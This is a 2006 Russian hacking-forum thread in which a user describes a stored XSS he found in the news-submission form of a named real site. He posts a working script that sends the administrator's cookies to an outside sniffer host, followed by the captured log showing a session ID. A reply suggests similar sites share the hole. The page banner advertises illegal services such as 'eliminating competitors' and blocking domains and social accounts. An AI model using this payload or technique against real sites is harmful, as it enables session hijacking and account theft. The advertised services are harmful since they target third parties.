Форум АНТИЧАТ - XSS на whitep.net

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS на whitep.net

Опции темы

Поиск в этой теме

Опции просмотра

XSS на whitep.net

07.03.2006, 17:18

•••™NO FEAR™•••

Постоянный

Регистрация: 08.08.2005

Сообщений: 782

Провел на форуме:
6573706

Репутация: 1419

XSS на whitep.net

Вот нашёл XSS на _http://whitep.net/
Сам скрипт который мы отсылаем в _http://whitep.net/modules.php (в добавлении новостей)

Код:

<script>img = new Image(); img.src = "http://s.netsec.ru/nofear/pic.gif?"+document.cookie;</script>

Новость сначало отсылается администратору, затем только тогда он добавляет её сам, ну и ему получается приходит наше сообщение, затем мы просто принимаем куки на снифе:

Код:

Date	07.03.2006 15:02	
IP 	***********	
Real Ip	***********	
Referer	http://whitep.net/modules.php	
Query	modtids=,; forum_read=a:1:{i:3;i:1141736162;}; topicsread=a:1:{i:46;i:1141736168;}; session_id=24123b67852c03e898fdea85869bf25e; hotlog=1	
Browser	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50

07.03.2006, 17:21

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

хм, наверно это на всех спайзах такое есть, где новости посылать можно...
помоему там код видно будет еще...

__________________
Фреймворк для спамера :(
Услуги программирования

07.03.2006, 17:25